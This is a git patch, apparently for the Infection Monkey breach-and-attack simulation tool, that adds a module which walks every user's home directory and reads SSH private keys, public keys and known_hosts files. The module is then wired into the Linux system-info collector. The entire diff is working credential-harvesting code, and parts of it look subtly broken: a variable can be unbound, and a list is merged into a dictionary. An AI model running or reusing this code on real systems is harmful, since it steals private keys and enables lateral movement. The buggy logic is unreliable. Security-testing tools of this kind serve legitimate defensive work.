From cdb4d459bbf4674801b865f4b4c06f89c6a10525 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 16 May 2018 15:19:59 +0300 Subject: [PATCH] SSH key-stealing implemented --- .../system_info/SSH_info_collector.py | 68 +++++++++++++++++++ .../system_info/linux_info_collector.py | 3 + 2 files changed, 71 insertions(+) create mode 100644 infection_monkey/system_info/SSH_info_collector.py diff --git a/infection_monkey/system_info/SSH_info_collector.py b/infection_monkey/system_info/SSH_info_collector.py new file mode 100644 index 000000000..d4bbddb15 --- /dev/null +++ b/infection_monkey/system_info/SSH_info_collector.py @@ -0,0 +1,68 @@ +import logging +import pwd +import sys +import os +import glob + +__author__ = 'VakarisZ' + +LOG = logging.getLogger(__name__) + + +class SSHCollector(object): + """ + SSH keys and known hosts collection module + """ + + default_dirs = ['/.ssh', '/'] + + @staticmethod + def get_info(): + home_dirs = SSHCollector.get_home_dirs() + ssh_info = SSHCollector.get_ssh_files(home_dirs) + LOG.info("Scanned for ssh keys") + return ssh_info + + @staticmethod + def get_home_dirs(): + home_dirs = [{'name': 'root', 'home_dir': '/root', 'public_key': None, + 'private_key': None, 'known_hosts': None}] + for usr in pwd.getpwall(): + if usr[5].startswith('/home'): + ssh_data = {'name': usr[0], 'home_dir': usr[5], 'public_key': None, + 'private_key': None, 'known_hosts': None} + home_dirs.append(ssh_data) + return home_dirs + + @staticmethod + def get_ssh_files(usr_info): + for info in usr_info: + path = info['home_dir'] + for directory in SSHCollector.default_dirs: + if os.path.isdir(path + directory): + try: + os.chdir(path + directory) + # searching for public key + if glob.glob('*.pub'): + public = '/' + (glob.glob('*.pub')[0]) + try: + with open(path + directory + public) as f: + info['public_key'] = f.read() + private = public.split('.')[0] + except: + pass + if os.path.exists(path + directory + private): + try: + with open(path + directory + private) as f: + info['private_key'] = f.read() + except: + pass + if os.path.exists(path + directory + '/known_hosts'): + try: + with open(path + directory + '/known_hosts') as f: + info['known_hosts'] = f.read() + except: + pass + except: + pass + return usr_info diff --git a/infection_monkey/system_info/linux_info_collector.py b/infection_monkey/system_info/linux_info_collector.py index ccdd7cb30..556be812a 100644 --- a/infection_monkey/system_info/linux_info_collector.py +++ b/infection_monkey/system_info/linux_info_collector.py @@ -1,6 +1,7 @@ import logging from . import InfoCollector +from SSH_info_collector import SSHCollector __author__ = 'uri' @@ -26,4 +27,6 @@ class LinuxInfoCollector(InfoCollector): self.get_process_list() self.get_network_info() self.get_azure_info() + self.info['ssh_info'].update(SSHCollector.get_info()) return self.info +